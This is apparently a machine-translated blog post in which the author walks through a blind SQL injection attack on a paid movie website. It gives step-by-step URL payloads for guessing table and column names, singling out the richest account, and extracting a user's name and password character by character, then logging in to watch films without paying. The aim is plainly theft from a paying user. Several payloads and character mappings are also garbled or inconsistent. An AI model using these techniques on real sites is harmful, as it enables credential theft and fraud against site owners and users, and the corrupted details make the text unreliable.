SQL injection is boring for website intrusion instances over the past few days. if you want to go online and watch a few movies, you can find all the movies that require Money, it is better to find a hacker with a vulnerability to send money. Therefore, the plan begins:
(To avoid unnecessary misunderstanding, the website, user name, and password have been modified, but the method is 100% original)
1. search for entries
Preparation: If you have never tried SQL injection attacks before, you should disable the HTTP friendly prompt so that you can clearly see the prompt information returned by the server.
Try several pages with input parameters to test whether SQL injection vulnerabilities exist one by one. the identification method is to add the ID = *** x in the URL bar, or enter the number in the form, if an expression error is prompted, it indicates a vulnerability can be injected. In addition, the database type used by the program can be obtained through this method.
Tested, found that there are several pages with injection vulnerability, decided from the http://www.movie.com/movie.ASP? Start with ID = 1000 and enter the http://www.movie.com/movie.ASP? ID = 1000. the following message is displayed: ACCESS is used for the database, and expression error is prompted near ArticleID = 1000. Hey, it was originally a movie site changed from the article system.
2. observe the website environment
The website provides the following functions: video classification, video introduction, and video search. The video ID ranges from.
3. check the name of the table and start the action.
The first step of action is from the guess table name, http://www.movie.com/movie.ASP? ID = 1000, change 1000 to (select count (1) from user), then his original SQL statement will become:
Select [field list] from [film table] where film ID = (select count (1) from user)
If you guess the table name, the following three situations may occur:
A. display the information of A video (coincidence)
B. The video cannot be found (if any, whether it is EOF)
C. error message (eof or bof)
If an error occurs, the system prompts that the table name cannot be found.
Put common table names such as user, users, member, members, userlist, memberlist, userinfo, admin, manager, user, and yonghu one by one for trial. Generally, the success rate is not lower than 80%.
Result: the user name of the website is users.
4. guess the column name
To guess the column name, you don't need to explain how to do it. change (select count (1) from users) to (select count (id) from users ), if the prompt "no field is found" is not displayed, it indicates that the field name is correct, and the field generally does not have to be too laborious. you can probably guess some information by looking at the form name during Login.
Sure enough, this website is no exception. the fields in the user table are ID (number), UserID (text), Password (text), and the point field is difficult to guess.
5. lock the target
Let the users table only return one record with the most money, so as to guess and avoid guessing some usernames without money:
Http://www.movie.com/movie.ASP? ID = (select 1000 from user where money> 1000) result: the subquery cannot return more than two records.
Lock> 10000, prompt unchanged;
Locked> 100000. the system prompts that the record cannot be found, indicating that no user with points greater than 0.1 million has been found;
From 10 thousand to 0.1 million, we gradually reduced the range and learned that there is only one record for points over 25500.
6. calculate the username and password length
Because the video ID ranges from 1000 to, you can use the length of UserID + (that is, the video ID) to calculate the length of the user name. type:
Http://www.movie.com/movie.ASP? ID = (select len (UserID) % 2B 1000 from user where money> 25500) % 2B what is it? Because the "+" request in the address bar will become a space, the "+" must be expressed as "% 2B" after UrlEncode. The result returns a video named "Shuang Xiong". what should I do? Is there a search function? Search for the video ID.
After searching, the video ID is 1006. Obviously, the username length is 1006-1000 = 6. Similarly, the password length is 8.
7. step-by-step cracking username
If you have some SQL application experience, you should have thought of the method:
Http://www.movie.com/movie.ASP? ID = (select asc (mid (UserID, 1000) % 2B 25500 from user where money>)
Hehe, return another video, search for it, and the video ID is 1104, that is, asc (mid (UserID, 104) =
In the same way, the following result is obtained:
Asc (mid (UserID, 2, 1) = 117
Asc (mid (UserID, 3, 1) = 97
Asc (mid (UserID, 4, 1) = 106
Asc (mid (UserID, 5, 1) = 105
Asc (mid (UserID, 6, 1) = 101
Because len (UserID) = 6, it is enough to count to 6th bits. query the table corresponding to asc (a few programming statements can be written), chr (104) = h, chr (117) = u, chr (97) = a, chr (106) = j, chr (105) = I, chr (101) = e
The user name is huajie.
8. crack the password in the same way
Asc (mid (Password, 1, 1) = 49 => chr (49) = 1
Asc (mid (Password, 2, 1) = 57 => chr (49) = 9
Asc (mid (Password, 3, 1) = 55 => chr (49) = 7
Asc (mid (Password, 4, 1) = 56 => chr (49) = 8
Asc (mid (Password, 5, 1) = 48 => chr (49) = 0
Asc (mid (Password, 6, 1) = 55 => chr (49) = 7
Asc (mid (Password, 7,1) = 55 => chr (49) = 1
Asc (mid (Password, 8, 1) = 55 => chr (49) = 2
Put it together: 19780712, haha, and use the password for the birthday!
Next, enter the user name and password to log on to the system! It took 30 minutes to guess the table name list, 15 minutes to crack it, and 45 minutes to hack a site. What to do next? Of course, it's just a few G movies.